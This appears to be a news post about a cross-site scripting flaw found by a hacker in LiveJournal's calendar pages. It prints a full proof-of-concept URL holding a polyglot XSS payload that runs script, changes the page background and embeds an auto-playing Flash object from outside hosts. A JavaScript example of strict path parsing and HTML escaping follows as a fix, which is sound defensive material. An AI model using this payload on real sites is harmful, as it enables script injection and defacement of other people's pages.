LiveJournal.com Vulnerable to Cross-Site Scripting (XSS), Found by Sony


After an interesting XSS find, hacker Sony (inSecurity.Ro Team) has come up with an even more interesting one: this time he discovered an XSS vulnerability in the official LiveJournal website.

LiveJournal is a vibrant global social media platform where users share common passions and interests. The hacker claimed he found the XSS in the calendar of Livejournal.com and that it took only 5 minutes to discover the security flaw.

Demo:
http://lj-support.livejournal.com/2012/02/%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%22%3E%3Cbody%20background=%22http://www.lenagold.ru/fon/peo/det/dety38.jpg%22%3E%3Cscript%3Ealert%28%22inSecurity.Ro%20Presents:Cross%20Site%20Scripting%20-Don%27t%20Cry..create%20by%20Sony%22%29%3C/script%3E%20%20%3Cobject%20data=http://htmlka.com/wp-content/uploads/2009/06/webplayer.swf%20type=%22application/x-shockwave-flash%22%20width=%22240%22%20height=%2264%22%3E%3Cparam%20name=%22movie%22%20value=http://htmlka.com/wp-content/uploads/2009/06/webplayer.swf%3E%3Cparam%20name=%22menu%22%20value=%22false%22%3E%20%3Cparam%20name=%22scale%22%20value=%22noscale%22%3E%3Cparam%20name=%22flashvars%22%20value=%22src=http://www.audiopoisk.com/files/no/guns-n-roses---guns-n-roses---13---dont-cry-398865.mp3&autostart=yes%22%3E%3C/object%3E
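
The demo URL carries its markup in the path segment that follows `/2012/02/`. One way a calendar handler can refuse such paths and encode anything it echoes, as an added example that is not code from the original post or from LiveJournal; the URL layout and the names `parseCalendarPath` and `renderCalendarPage` are assumptions.

```javascript
// Added example. Assumption: calendar URLs look like /YYYY/, /YYYY/MM/ or /YYYY/MM/DD/.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode text for an HTML element-content or quoted-attribute context.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Return {year, month, day} for a well-formed calendar path, otherwise null.
function parseCalendarPath(rawPath) {
  let path;
  try {
    path = decodeURIComponent(rawPath);
  } catch (err) {
    return null; // malformed percent-encoding
  }
  const m = /^\/([12]\d{3})(?:\/(\d{2})(?:\/(\d{2}))?)?\/?$/.exec(path);
  if (!m) return null; // anything beyond digits and slashes is rejected
  const year = Number(m[1]);
  const month = m[2] === undefined ? null : Number(m[2]);
  const day = m[3] === undefined ? null : Number(m[3]);
  if (month !== null && (month < 1 || month > 12)) return null;
  if (day !== null) {
    // Day 0 of the following month is the last day of this month.
    const lastDay = new Date(Date.UTC(year, month, 0)).getUTCDate();
    if (day < 1 || day > lastDay) return null;
  }
  return { year, month, day };
}

// Hypothetical page renderer: only parsed integers reach the 200 response,
// and the 404 response encodes the requested path before echoing it.
function renderCalendarPage(rawPath) {
  const date = parseCalendarPath(rawPath);
  if (date === null) {
    return { status: 404, body: `<p>No calendar page at ${escapeHtml(rawPath)}</p>` };
  }
  const label = [date.year, date.month, date.day]
    .filter((part) => part !== null)
    .map((part) => String(part).padStart(2, '0'))
    .join('-');
  return { status: 200, body: `<h1>Entries for ${label}</h1>` };
}

// Constructed sample requests.
for (const p of ['/2012/02/', '/2012/02/30/', '/2012/02/<b>x</b>']) {
  console.log(p, '->', JSON.stringify(renderCalendarPage(p)));
}
```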